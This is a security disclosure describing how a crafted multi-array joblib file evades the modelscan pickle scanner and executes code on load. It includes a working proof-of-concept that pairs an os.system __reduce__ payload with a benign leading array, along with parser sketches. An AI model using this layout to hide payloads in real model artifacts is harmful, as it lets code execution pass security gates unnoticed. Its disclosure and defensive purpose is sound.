modelscan silent (exit-0) bypass: a numeric numpy array truncates genops in a multi-array joblib, hiding a trailing object-array pickle.load RCE
Severity: High (silent CLEAN pass: total_issues=0, errors=0, file marked scanned, exit 0, while joblib.load achieves RCE)
Affected tool: modelscan 0.8.8 (PickleUnsafeOpScan / tools/picklescanner.py). Loader: joblib.load (joblib 1.5.3, NumpyArrayWrapper.read_array).
Category: ModelScan scanner-bypass on .joblib ($4k format).
Summary
joblib stores a multi-array container as a flat sequence [wrapper#1][array#1 data][wrapper#2][array#2 data]…, where each array's data is read positionally: numeric arrays as exactly N*itemsize raw bytes, object-dtype arrays as a nested pickle.load. modelscan doesn't model this framing: it feeds the whole raw file to _list_globals, which loops pickletools.genops. In the layout {benign object-array, numeric array, malicious object-array}:
- the leading benign object array is a valid pickle prefix ending in STOP → genops succeeds, and modelscan collects only benign globals;
- the next numeric array's raw little-endian bytes are not valid opcodes → genops raises, but because globals were already found, scan_pickle_bytes returns those benign globals and stops without recording an error, so errors stays empty;
- the trailing malicious object array (os.system + REDUCE) lies in the region genops never reached → never scanned.
Result: total_issues=0, issues=[], errors=[], file marked scanned, CLI exit 0 (CLEAN). joblib.load reaches the trailing array positionally and pickle.load executes the payload. The leading benign object array is the key ingredient: it converts what would otherwise be a noisy PickleGenopsError (exit 2) into a silent clean pass.
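The parsing behaviour described above can be illustrated with the standard library alone. This is a minimal sketch, not modelscan's code: it builds a synthetic stream (benign pickle, raw float64 bytes, second benign pickle) as a stand-in for the joblib layout, and assumes only that the file is walked with pickletools.genops. All variable names are hypothetical.

```python
import io
import pickle
import pickletools
import struct

# Synthetic stand-in for the layout: [pickle][raw numeric bytes][pickle].
first = pickle.dumps(["age", "income", "score"], protocol=2)
raw = struct.pack("<3d", 0.1, 0.2, 0.3)  # 24 raw little-endian float64 bytes
second = pickle.dumps({"tail": True}, protocol=2)
stream = io.BytesIO(first + raw + second)

# First pass: genops walks the leading pickle and stops at its STOP opcode.
ops = [opcode.name for opcode, _arg, _pos in pickletools.genops(stream)]
offset_after_first = stream.tell()

# Second pass: the next byte belongs to the raw float data (0x9a for 0.1),
# which is not a pickle opcode, so genops raises ValueError.
try:
    list(pickletools.genops(stream))
    second_pass_error = None
except ValueError as exc:
    second_pass_error = exc

print(ops[-1], offset_after_first, second_pass_error)
```

The second pickle is never visited, which is the synthetic counterpart of the unscanned trailing object array.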
Root cause
- Scanner: modelscan/tools/picklescanner.py, _list_globals (lines 50-119, genops accumulation loop) and scan_pickle_bytes (lines 122-152). On GenOpsError with e.globals not None, it returns _build_scan_result_from_raw_globals(e.globals, …) → ScanResults(issues, [], []) (empty errors). .joblib routes here via settings.py (.joblib → PICKLE) and scanners/pickle/scan.py PickleUnsafeOpScan (multiple_pickles=True).
- Loader sink: joblib/numpy_pickle.py read_array, lines 173-175: if self.dtype.hasobject: array = pickle.load(unpickler.file_handle) (object arrays = nested pickle.load RCE); numeric arrays read N*itemsize raw bytes whose little-endian content terminates genops.
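The error-handling pattern in the scanner bullet can be modelled in a few lines. The sketch below is a hypothetical simplification, not the modelscan source: scan_stream, its strict flag, and the dumps helper are invented for illustration, and only the GLOBAL opcode is tracked (protocol 2 is used so that globals appear as GLOBAL). The strict branch is an assumed mitigation, shown only for contrast with the lenient behaviour described above.

```python
import io
import pickle
import pickletools
import struct
from fractions import Fraction


def scan_stream(data: bytes, strict: bool):
    """Hypothetical model of a genops accumulation loop (not modelscan's code)."""
    stream = io.BytesIO(data)
    found, errors = [], []
    while stream.tell() < len(data):
        start = stream.tell()
        try:
            for opcode, arg, _pos in pickletools.genops(stream):
                if opcode.name == "GLOBAL":
                    found.append(arg)  # arg has the form "module name"
        except Exception as exc:
            # Lenient policy (the behaviour the report describes): if globals
            # were already collected, keep them and drop the error.
            # Strict policy (assumed mitigation): always record the failure.
            if strict or not found:
                errors.append(f"parse stopped in pickle at byte {start}: {exc}")
            break
    return found, errors


def dumps(obj):
    # Protocol 2 emits the GLOBAL opcode, which keeps this sketch short.
    return pickle.dumps(obj, protocol=2, fix_imports=False)


benign = dumps(Fraction(1, 2))
raw = struct.pack("<3d", 0.1, 0.2, 0.3)  # stand-in for a numeric array body
tail = dumps(Fraction(3, 4))             # stand-in for the trailing object array

lenient = scan_stream(benign + raw + tail, strict=False)
strict = scan_stream(benign + raw + tail, strict=True)
no_prefix = scan_stream(raw + tail, strict=False)
print(lenient, strict, no_prefix, sep="\n")
```

In this model the lenient run returns one benign global and no errors, the strict run records the parse failure, and the run without a leading pickle is noisy even under the lenient policy.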
Reproduce
python poc/POC_clean_bypass.py (env: modelscan 0.8.8, joblib 1.5.3, numpy 1.26.4). Minimal:
import os
import joblib
import numpy as np

class Evil:
    def __reduce__(self): return (os.system, ('echo pwned> PWN.txt',))

joblib.dump({'feature_names': np.array(['age','income','score'], dtype=object),
             'weights': np.array([0.1,0.2,0.3]),
             'extra': np.array([Evil()], dtype=object)}, 'poc.joblib', compress=0)
Running the real modelscan -p poc.joblib -r json → {total_issues:0, issues:[], errors:[], total_scanned:1}, exit 0. joblib.load('poc.joblib') → os.system RCE (marker written). genops aborts at byte 501; the system token sits at byte 737 (unparsed tail).
Differential controls (both ingredients are load-bearing):
- top-level Evil → DETECTED (1 issue);
- {evil-objarr}, no numeric → DETECTED;
- {benign-obj, evil-obj}, no numeric gap → DETECTED;
- {numeric, evil-obj}, no leading benign → 0 issues but PickleGenopsError (exit 2, noisy);
- {benign-obj, numeric, evil-obj} → 0 issues, 0 errors, exit 0 (SILENT CLEAN).
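The offsets quoted above (parse abort versus token position) can be checked for any file with a small triage helper. This is a hedged sketch: parse_stop_offset and tokens_in_unparsed_tail are hypothetical names, the needle list is an arbitrary assumption, and the demo data is a harmless synthetic stream rather than the PoC file.

```python
import io
import pickle
import pickletools
import struct


def parse_stop_offset(data: bytes) -> int:
    """Offset where consecutive genops parsing gives up (len(data) if it never does)."""
    stream = io.BytesIO(data)
    while stream.tell() < len(data):
        start = stream.tell()
        try:
            for _ in pickletools.genops(stream):
                pass
        except Exception:
            return start  # start of the region genops could not parse
    return len(data)


def tokens_in_unparsed_tail(data: bytes, needles=(b"system", b"posix", b"subprocess")):
    """Report suspicious byte strings located at or after the parse-stop offset."""
    stop = parse_stop_offset(data)
    hits = {}
    for needle in needles:
        idx = data.find(needle, stop)
        if idx != -1:
            hits[needle] = idx
    return stop, hits


# Harmless synthetic stream: the tail is a pickled string, not a gadget.
benign = pickle.dumps(["age"], protocol=2)
raw = struct.pack("<3d", 0.1, 0.2, 0.3)
tail = pickle.dumps("call system here", protocol=2)

stop, hits = tokens_in_unparsed_tail(benign + raw + tail)
print(stop, hits)
```

A plain byte search is crude and will produce false positives on ordinary data; it is meant only to show where the unparsed region begins and what it may hide.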
Impact
A malicious .joblib that modelscan reports fully clean (exit 0, marked scanned) achieves RCE on joblib.load. The trigger layout {object-array feature names, numeric weights, object-array} is the natural shape of real sklearn/pandas artifacts, so the payload is camouflaged as an ordinary model. This defeats modelscan as a pre-deploy/CI/HF-upload gate for .joblib/.pkl. (The RCE primitive lives in the joblib loader; modelscan's silent false negative is the detection-evasion vulnerability, a separately reportable modelscan bypass.)
Dup-check
Distinct from GHSA-9gvj (STACK_GLOBAL offset-0 → crash/ValueError; here _list_globals returns valid globals and yields a CLEAN exit-0 pass, not a crash). Distinct from the picklescan ZIP/EOCD CVEs (no ZIP), GHSA-769v (extension bypass), and the Hide-and-Seek joblib compression bypasses (file is uncompressed and IS parsed). Distinct from CVE-2024-34997 (the joblib loader primitive, not a scanner bypass). Distinct from our R1 joblib 0x2e-STOP-byte finding (no crafted STOP byte; the genops terminator is natural numeric-array data; the novel ingredient is the multi-array positional layout + leading benign object array flipping error → clean + trailing object-array pickle.load sink). No public source describes this.
Note: this shares the "genops aborts before the gadget" class with our R2 FRAME-readline, R5 multi-pickle, and R8 int-radix findings, but the mechanism (numeric-array bytes + leading-benign-array silencing) and the silent-exit-0 outcome are distinct. It is the strongest representative for the .joblib format in that class.